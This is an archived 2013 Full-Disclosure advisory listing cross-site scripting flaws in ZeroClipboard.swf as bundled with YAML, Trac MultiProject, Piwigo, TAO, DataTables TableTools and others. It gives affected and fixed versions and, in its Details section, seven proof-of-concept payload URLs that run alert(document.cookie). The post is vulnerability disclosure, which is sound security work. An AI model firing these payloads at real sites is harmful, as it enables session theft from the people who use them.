| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 20 Feb 2013 15:42:36 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
"1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: XSS vulnerabilities in YAML, Multiproject for Trac,
UserCollections for Piwigo,
TAO and TableTools for DataTables for jQuery
Hello list!
These are Cross-Site Scripting vulnerabilities in YAML, MultiProject
extension for Trac, UserCollections extension for Piwigo, TAO and TableTools
plugin for DataTables plugin for jQuery (with ZeroClipboard.swf).
Earlier I've wrote about Cross-Site Scripting vulnerabilities in
ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote
that this is very widespread flash-file and it's placed at tens of thousands
of web sites. And it's used in hundreds of web applications. Among them are
YAML, Multiproject for Trac, UserCollections for Piwigo, TAO and TableTools
for DataTables for jQuery. And there are many other vulnerable web
applications with ZeroClipboard.
-------------------------
Affected products:
-------------------------
Vulnerable are the next web applications with ZeroClipboard:
YAML 4.0.2 and previous versions.
Multiproject extension for Trac: Multiproject 1.4.21 and previous versions.
UserCollections extension for Piwigo.
TAO 2.3.1 and previous versions.
TableTools plugin for DataTables plugin for jQuery. Particularly it's
bundled with InfoGlue 2.1 (and previous versions) and OGDI Field 6.x-1.0
(and previous versions) for Drupal.
Both XSS vulnerabilities in ZeroClipboard are fixed in latest version (by
new developers), such as ZeroClipboard 1.1.7. All developers should update
swf-file in their software.
----------
Details:
----------
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into buffer (as described
in previous advisory).
YAML:
http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Multiproject extension for Trac:
http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
UserCollections extension for Piwigo:
http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
TAO:
http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
TableTools plugin for DataTables plugin for jQuery:
http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
InfoGlue:
http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
OGDI Field for Drupal:
http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists